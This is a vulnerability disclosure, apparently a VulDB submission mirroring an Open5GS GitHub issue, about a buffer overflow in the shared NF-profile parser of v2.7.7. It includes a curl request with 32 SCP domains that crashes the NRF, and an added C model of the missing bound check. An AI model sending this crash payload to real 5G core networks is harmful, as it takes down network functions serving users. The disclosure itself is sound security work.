Submission #818582: Open5GS AMF, AUSF, BSF, NSSF, PCF, SMF, UDM, UDR, SCP, SEPP, NRF v2.7.7 Denial of Service Info

Title: Open5GS AMF, AUSF, BSF, NSSF, PCF, SMF, UDM, UDR, SCP, SEPP, NRF v2.7.7 Denial of Service
Description:

### Open5GS Release, Revision, or Tag

v2.7.7

### Description

Open5GS uses a shared NF-profile parser in `lib/sbi/nnrf-handler.c` across multiple network functions. In `handle_scp_info()`, each attacker-controlled SCP domain is copied into a fixed array without checking `OGS_MAX_NUM_OF_SCP_DOMAIN`:

```c
scp_info.domain[scp_info.num_of_domain].name = ogs_strdup(DomainInfoMap->key);
...
scp_info.num_of_domain++;
```

This leads to an out-of-bounds write at `../lib/sbi/nnrf-handler.c:591` and nearby lines (around `588-626` depending on build). In confirmed runs the failure mode is a segmentation fault / stack-smashing termination rather than a graceful validation error.

This is a shared parser bug, not an NRF-only bug (AMF, AUSF, BSF, NSSF, PCF, SMF, UDM, UDR, SCP, SEPP). A direct reproduction is shown below against NRF because it is the shortest setup, but the same handler is also reachable from other NF-profile parsing paths such as `nf-status-notify` and discovery responses consumed by other Open5GS network functions.

### Root cause

- Crash site: out-of-bounds write around `../lib/sbi/nnrf-handler.c:591`
- Bug class: fixed-size `scp_info.domain[]` overflow
- Controlling field: `NFProfile.scpInfo.scpDomainInfoList`

### Steps to reproduce

```bash
NRF_IP=$(docker inspect -f '{{range .NetworkSettings.Networks}}{{.IPAddress}}{{end}}' nrf)
payload=$(cat <<'EOF'
{"nfInstanceId":"fake-scp-nrf","nfType":"SCP","nfStatus":"REGISTERED","scpInfo":{"scpDomainInfoList":{"d0":{},"d1":{},"d2":{},"d3":{},"d4":{},"d5":{},"d6":{},"d7":{},"d8":{},"d9":{},"d10":{},"d11":{},"d12":{},"d13":{},"d14":{},"d15":{},"d16":{},"d17":{},"d18":{},"d19":{},"d20":{},"d21":{},"d22":{},"d23":{},"d24":{},"d25":{},"d26":{},"d27":{},"d28":{},"d29":{},"d30":{},"d31":{}}}}
EOF
)
curl --http2-prior-knowledge -m 5 -sS -i \
  -X PUT "http://$NRF_IP/nnrf-nfm/v1/nf-instances/fake-scp-nrf" \
  -H 'content-type: application/json' \
  --data "$payload"
docker inspect -f '{{.State.Status}} {{.State.ExitCode}} {{.State.FinishedAt}}' nrf
docker logs --tail 20 nrf
```

### Logs

```shell
curl: (56) Recv failure: Connection reset by peer
exited 139 2026-04-10T17:17:35.255649473Z
```

No HTTP error was returned to the client; the NRF process exited immediately after the request.

### Expected behaviour

Open5GS should reject excessive `scpDomainInfoList` entries before writing past `OGS_MAX_NUM_OF_SCP_DOMAIN`, and it should never let peer-controlled NF-profile data corrupt memory.

### Observed Behaviour

The request corrupts memory and terminates the process with exit code `139`.

### eNodeB/gNodeB

Not required.

### UE Models and versions

Not required.
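The bound check the report describes as missing, shown as an added stand-alone C model that is not Open5GS's own code: a fixed-size domain array is filled from a key list the way the shared parser does, but the array limit is checked before every write and an over-long list is rejected as a whole. `MAX_SCP_DOMAIN`, the struct names, `try_domain_list()` and the `d0..dN` sample keys are all constructed here as assumptions, not taken from `nnrf-handler.c`.

```c
#define _POSIX_C_SOURCE 200809L
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define MAX_SCP_DOMAIN 8 /* constructed stand-in for OGS_MAX_NUM_OF_SCP_DOMAIN */

/* Constructed model of the fixed-size domain array inside scp_info. */
typedef struct { char *name; } scp_domain_t;
typedef struct { scp_domain_t domain[MAX_SCP_DOMAIN]; int num_of_domain; } scp_info_t;

void free_scp_domains(scp_info_t *info)
{
    for (int i = 0; i < info->num_of_domain; i++) free(info->domain[i].name);
    info->num_of_domain = 0;
}

/* Copies domain keys into info->domain[] as the shared parser does, but checks the
 * bound BEFORE each write. Returns 0 on success, -1 if the list exceeds the array,
 * in which case nothing is kept and the caller should reject the whole profile. */
int parse_scp_domains(scp_info_t *info, const char *const *keys, size_t nkeys)
{
    memset(info, 0, sizeof(*info));
    for (size_t i = 0; i < nkeys; i++) {
        if (info->num_of_domain >= MAX_SCP_DOMAIN) { /* the check the report says is missing */
            free_scp_domains(info);
            return -1;
        }
        info->domain[info->num_of_domain].name = strdup(keys[i]);
        info->num_of_domain++;
    }
    return 0;
}

int last_count; /* domains retained by the most recent try_domain_list() call */

/* Builds a constructed key list d0..d(n-1), shaped like the report's payload, and parses it. */
int try_domain_list(size_t n)
{
    char **keys = calloc(n, sizeof(*keys));
    for (size_t i = 0; i < n; i++) {
        keys[i] = malloc(16);
        snprintf(keys[i], 16, "d%zu", i);
    }
    scp_info_t info;
    int rc = parse_scp_domains(&info, (const char *const *)keys, n);
    last_count = info.num_of_domain;
    free_scp_domains(&info);
    for (size_t i = 0; i < n; i++) free(keys[i]);
    free(keys);
    return rc; /* try_domain_list(8) -> 0; try_domain_list(32) -> -1 with last_count 0 */
}
```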
Source: https://github.com/open5gs/open5gs/issues/4468
User: ZiyuLin (UID 93568)
Submitted: 2026-05-04 04:56 (1 month ago)
Moderated: 2026-05-29 19:15 (26 days later)
Status: Accepted
VulDB entry: 367292 [Open5GS up to 2.7.7 Shared NF-profile Parser lib/sbi/nnrf-handler.c handle_scp_info memory corruption]
Points: 20
